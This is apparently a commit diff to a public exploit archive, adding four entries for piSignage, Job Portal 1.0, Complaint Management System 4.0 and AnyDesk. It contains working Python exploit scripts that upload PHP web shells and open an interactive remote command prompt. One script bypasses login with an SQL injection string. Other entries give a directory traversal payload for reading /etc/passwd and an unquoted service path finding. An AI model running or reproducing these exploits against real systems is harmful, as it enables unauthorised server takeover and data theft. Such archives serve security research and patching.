DB: 2020-01-08

Offensive Security · Offensive Security · commit fe24bda1f586 · 2020-01-08T05:02:04.000Z
4 changes to exploits/shellcodes

AnyDesk 5.4.0 - Unquoted Service Path
Job Portal 1.0 - Remote Code Execution
piSignage 2.6.4 - Directory Traversal
Complaint Management System 4.0 - Remote Code Execution
diff --git a/exploits/hardware/webapps/47882.txt b/exploits/hardware/webapps/47882.txt
@@ -0,0 +1,19 @@
+# Exploit Title: piSignage 2.6.4 - Directory Traversal
+# Date: 2019-11-13
+# Exploit Author: JunYeong Ko
+# Vendor Homepage: https://pisignage.com/
+# Version:  piSignage before 2.6.4
+# Tested on: piSignage before 2.6.4
+# CVE : CVE-2019-20354
+
+Summary:
+The web application component of piSignage before 2.6.4 allows a remote attacker (authenticated as a low-privilege user) to download arbitrary files from the Raspberry Pi via api/settings/log?file=../ path traversal. In other words, this issue is in the player API for log download.
+
+PoC:
+1. Click the Log Download button at the bottom of the 'piSignage' administration page.
+2. HTTP Packet is sent when the button is pressed.
+3. Change the value of 'file' parameter to ../../../../../../../../../../etc/passwd.
+4. You can see that the /etc/passwd file is read.
+
+References:
+https://github.com/colloqi/piSignage/issues/97
diff --git a/exploits/php/webapps/47881.py b/exploits/php/webapps/47881.py
@@ -0,0 +1,47 @@
+# Exploit Title: Job Portal 1.0 - Remote Code Execution
+# Google Dork: N/A
+# Date: 2020-01-03
+# Exploit Author: Tib3rius
+# Vendor Homepage: https://phpgurukul.com/job-portal-project/
+# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7855
+# Version: 1.0
+# Tested on: Ubuntu 16.04
+# CVE: N/A
+
+import argparse
+import random
+import requests
+import string
+import sys
+
+parser = argparse.ArgumentParser()
+parser.add_argument('url', action='store', help='The URL of the target.')
+args = parser.parse_args()
+
+url = args.url.rstrip('/')
+random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))
+
+payload = '<?php echo shell_exec($_GET[\'cmd\']); ?>'
+
+file = {'file': (random_file + '.php', payload, 'text/php')}
+print('> Attempting to upload PHP web shell...')
+r = requests.post(url + '/admin/gallery.php', files=file, data={'submit':'1'}, verify=False)
+print('> Verifying shell upload...')
+r = requests.get(url + '/admin/uploadimg/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)
+
+if random_file in r.text:
+    print('> Web shell uploaded to ' + url + '/admin/uploadimg/' + random_file + '.php')
+    print('> Example command usage: ' + url + '/admin/uploadimg/' + random_file + '.php?cmd=whoami')
+    launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))
+    if launch_shell.lower() == 'y':
+        while True:
+            cmd = str(input('RCE $ '))
+            if cmd == 'exit':
+                sys.exit(0)
+            r = requests.get(url + '/admin/uploadimg/' + random_file + '.php', params={'cmd':cmd}, verify=False)
+            print(r.text)
+else:
+    if r.status_code == 200:
+        print('> Web shell uploaded to ' + url + '/admin/uploadimg/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')
+    else:
+        print('> Web shell failed to upload! The web server may not have write permissions.')
diff --git a/exploits/php/webapps/47884.py b/exploits/php/webapps/47884.py
@@ -0,0 +1,64 @@
+# Exploit Title: Complaint Management System 4.0 - Remote Code Execution
+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/complaint-management-sytem/
+# Version: v4.0
+# Category: Webapps
+# Tested on: Xampp for Windows
+# Description:
+# There isn't any file extension control at the "Register Complaint" section of user panel.
+# An unauthorized user can upload and execute php file.
+# Below basic python script will bypass authentication and execute command on target server.
+
+poc.py
+
+#!/usr/bin/python
+
+import requests
+import sys
+                  
+
+if len(sys.argv) !=3:
+	print "[*] Usage: PoC.py rhost/rpath command"
+	print "[*] e.g.: PoC.py 127.0.0.1/cms ipconfig"
+	exit(0) 
+
+rhost = sys.argv[1]
+command = sys.argv[2]
+
+#authentication bypass
+url = "http://"+rhost+"/users/index.php"
+data = {"username": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""}
+
+with requests.Session() as session:
+	
+	login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
+
+	
+	#check authentication bypass
+	check = session.get("http://"+rhost+"/users/dashboard.php", allow_redirects=False)
+	print ("[*] Status code for login: %s"%check.status_code)
+	if check.status_code == 200:
+		print ("[+] Authentication bypass was successfull")
+	else:
+		print ("[-] Authentication bypass was unsuccessful")
+		sys.exit()
+	
+	#upload php file
+	ufile = {'compfile':('command.php', '<?php system($_GET["cmd"]); ?>')}
+	fdata = {"category": "1", "subcategory": "Online Shopping", "complaintype": " Complaint", "state": "Punjab", "noc": "the end", "complaindetails": "the end","compfile": "commmand.php", "submit": ""}
+	furl = "http://"+rhost+"/users/register-complaint.php"
+	fupload = session.post(url=furl, files= ufile, data=fdata)
+
+	#execution
+	final=session.get("http://"+rhost+"/users/complaintdocs/command.php?cmd="+command)
+
+	if final.status_code == 200:
+		print "[+] Command execution completed successfully.\n"
+		print "\tPut on a happy face.\n"
+	else:
+		print "[-] Command execution was unsuccessful."
+		print "\tOne bad day!"
+		sys.exit()
+
+	print final.text
diff --git a/exploits/windows/local/47883.txt b/exploits/windows/local/47883.txt
@@ -0,0 +1,18 @@
+# Exploit Title: AnyDesk 5.4.0 - Unquoted Service Path
+# Exploit Author: SajjadBnd
+# Date: 2019-12-23
+# Vendor Homepage: http://anydesk.com
+# Software Link: https://download.anydesk.com/AnyDesk.exe
+# Version: Software Version 5.4.0
+# Tested on: Win10 x64
+
+SERVICE_NAME: AnyDesk
+         TYPE              : 10  WIN32_OWN_PROCESS
+         START_TYPE        : 2   AUTO_START
+         ERROR_CONTROL     : 1   NORMAL
+         BINARY_PATH_NAME  : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service
+         LOAD_ORDER_GROUP  :
+         TAG               : 0
+         DISPLAY_NAME      : AnyDesk Service
+         DEPENDENCIES      : RpcSs
+         SERVICE_START_NAME: LocalSystem
diff --git a/files_exploits.csv b/files_exploits.csv
@@ -10884,6 +10884,7 @@ id,file,description,date,author,type,platform,port
 47845,exploits/windows/local/47845.txt,"Plantronics Hub 3.13.2 - Local Privilege Escalation",2020-01-03,Markus,local,windows,
 47852,exploits/windows/local/47852.txt,"Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path",2020-01-06,ZwX,local,windows,
 47880,exploits/windows/local/47880.cc,"Windows - Shell COM Server Registrar Local Privilege Escalation",2020-01-02,0vercl0k,local,windows,
+47883,exploits/windows/local/47883.txt,"AnyDesk 5.4.0 - Unquoted Service Path",2020-01-07,SajjadBnd,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42182,3 +42183,6 @@ id,file,description,date,author,type,platform,port
 47875,exploits/php/webapps/47875.txt,"Voyager 1.3.0 - Directory Traversal",2020-01-06,NgoAnhDuc,webapps,php,
 47876,exploits/php/webapps/47876.txt,"Codoforum 4.8.3 - Persistent Cross-Site Scripting",2020-01-06,Prasanth,webapps,php,
 47879,exploits/python/webapps/47879.md,"Django < 3.0 < 2.2 < 1.11 - Account Hijack",2019-12-24,"Ryuji Tsutsui",webapps,python,
+47881,exploits/php/webapps/47881.py,"Job Portal 1.0 - Remote Code Execution",2020-01-07,Tib3rius,webapps,php,
+47882,exploits/hardware/webapps/47882.txt,"piSignage 2.6.4 - Directory Traversal",2020-01-07,"JunYeong Ko",webapps,hardware,
+47884,exploits/php/webapps/47884.py,"Complaint Management System 4.0 - Remote Code Execution",2020-01-07,"Metin Yunus Kandemir",webapps,php,
